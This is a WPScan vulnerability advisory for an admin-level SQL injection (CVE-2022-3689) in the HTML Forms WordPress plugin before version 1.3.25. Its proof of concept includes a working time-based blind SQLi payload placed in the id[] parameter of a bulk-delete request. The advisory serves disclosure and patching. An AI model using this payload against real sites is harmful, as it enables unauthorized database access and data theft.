WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

HTML Forms < 1.3.25 - Admin+ SQLi

Description

The plugin does not properly properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users

Proof of Concept

Access the submission page on https://example.com/wp-admin/admin.php?page=html-forms&view=edit&form_id=form_ID&tab=submissions

Capture the request after performing a Move to Trash action, replace the Submission ID with the SQLi payload, e.g

_hf_admin_action=bulk_delete_submissions&_wpnonce=nonce&id[]=1) AND (SELECT 2179 FROM (SELECT(SLEEP(5)))xaXr) AND (4033=4033

Affects Plugins

html-forms
Fixed in version 1.3.25

References

CVE
CVE-2022-3689

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Duy Quoc Khanh

Submitter

Nguyen Duy Quoc Khanh

Submitter twitter
ndqkhanh
Verified

Yes

WPVDB ID
e9c551a3-7482-4421-8197-5886d028776c

Timeline

Publicly Published

2022-11-07 (about 4 months ago)

Added

2022-11-07 (about 4 months ago)

Last Updated

2022-11-07 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin